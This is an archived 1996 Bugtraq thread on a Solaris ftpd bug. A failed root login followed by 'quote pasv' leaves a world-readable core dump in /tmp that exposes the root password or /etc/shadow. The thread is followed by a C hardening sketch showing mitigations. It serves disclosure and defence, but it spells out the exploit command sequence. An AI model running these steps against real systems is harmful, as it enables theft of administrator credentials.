Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: ftpd bug? Was: bin/1805: Bug in ftpd

Re: ftpd bug? Was: bin/1805: Bug in ftpd

James Poland 6-5251 (polandcam2.gsfc.nasa.gov)
Wed, 16 Oct 1996 08:52:57 -0400

Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

Examine the resulting core file with the strings command.

This method does not work with Solaris 2.4.

>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
>     so they seem to have used the proposed fix
>
>          Checking for "pw != NULL"
>
>     So this proposal was simple and obvious   ... and incomplete. :)
>
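Hardening sketch for the failure mode this thread describes, added here as an example; it is not Sun's ftpd, wu-ftpd, or any code from the posters. It assumes a hypothetical session structure, a constructed credential table in place of /etc/shadow and crypt(3), and a toy command handler. It shows the `pw != NULL` guard the PS mentions, plus the two measures that guard alone does not provide: wiping the cleartext password from memory as soon as it has been checked, and disabling core dumps in the daemon so a crash cannot write secrets into a world-readable file under /tmp.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>

/* Hypothetical account record; a real daemon would read the hash from
   /etc/shadow and compare with crypt(3). The table below is constructed. */
struct account {
    const char *name;
    const char *secret;   /* constructed sample credential, NOT a real hash */
};

static struct account accounts[] = {
    { "root", "correct-horse" },
};

/* Hypothetical per-connection state, loosely modelled on what an ftpd keeps
   between USER/PASS and later commands such as PASV. */
struct session {
    struct account *pw;    /* stays NULL until a login succeeds */
    char passbuf[128];     /* cleartext password as received on the wire */
    int logged_in;
};

/* Mitigation 1: no core file at all. Set soft and hard RLIMIT_CORE to zero
   early in the daemon so a crash after a failed login leaves nothing
   readable in the working directory (cd /tmp in the thread). */
int disable_core_dumps(void) {
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Mitigation 2: wipe secrets in a way the compiler cannot optimise away. */
static void scrub(void *p, size_t n) {
    volatile unsigned char *vp = (volatile unsigned char *)p;
    while (n--) *vp++ = 0;
}

static struct account *lookup_account(const char *name) {
    for (size_t i = 0; i < sizeof accounts / sizeof accounts[0]; i++)
        if (strcmp(accounts[i].name, name) == 0) return &accounts[i];
    return NULL;
}

/* USER/PASS handling. The password is copied into the session buffer the
   way a daemon would receive it, checked, and then scrubbed regardless of
   the outcome, so it is gone before any later command can crash the process.
   Returns 1 on success, 0 on failure (pw left NULL). */
int do_login(struct session *s, const char *user, const char *pass) {
    struct account *acct = lookup_account(user);
    strncpy(s->passbuf, pass, sizeof s->passbuf - 1);
    s->passbuf[sizeof s->passbuf - 1] = '\0';
    int ok = (acct != NULL) && strcmp(acct->secret, s->passbuf) == 0;
    scrub(s->passbuf, sizeof s->passbuf);
    s->pw = ok ? acct : NULL;
    s->logged_in = ok;
    return ok;
}

/* Mitigation 3: the "pw != NULL" guard from the thread. It stops the NULL
   dereference on PASV after a failed login; it does nothing about secrets
   still in memory, which is why the two measures above are also needed.
   Returns the FTP reply code the handler would send. */
int do_pasv(const struct session *s) {
    if (s->pw == NULL || !s->logged_in)
        return 530;   /* "Not logged in" */
    return 227;       /* "Entering Passive Mode" */
}

/* 1 if no byte of the password buffer survives (what a core would expose). */
int password_scrubbed(const struct session *s) {
    for (size_t i = 0; i < sizeof s->passbuf; i++)
        if (s->passbuf[i] != 0) return 0;
    return 1;
}

/* The sequence from the thread: "user root wrongpasswd" then "quote pasv". */
int pasv_after_failed_login(void) {
    struct session s; memset(&s, 0, sizeof s);
    do_login(&s, "root", "wrongpasswd");
    return do_pasv(&s);
}

int secret_gone_after_failed_login(void) {
    struct session s; memset(&s, 0, sizeof s);
    do_login(&s, "root", "wrongpasswd");
    return password_scrubbed(&s);
}

/* Sanity check that a correct login still reaches PASV and is also scrubbed. */
int pasv_after_good_login(void) {
    struct session s; memset(&s, 0, sizeof s);
    if (!do_login(&s, "root", "correct-horse")) return -1;
    if (!password_scrubbed(&s)) return -2;
    return do_pasv(&s);
}

int main(void) {
    disable_core_dumps();
    printf("PASV after failed login: %d\n", pasv_after_failed_login());
    printf("password scrubbed: %d\n", secret_gone_after_failed_login());
    printf("PASV after good login: %d\n", pasv_after_good_login());
    return 0;
}
```

On Solaris the same effect as `disable_core_dumps()` can be had system-wide with coreadm(1M) or per-process with `ulimit -c 0` in the daemon's startup script; the scrub step is the part no process limit substitutes for, since a core written anywhere else (or a debugger attach) would still see the buffer.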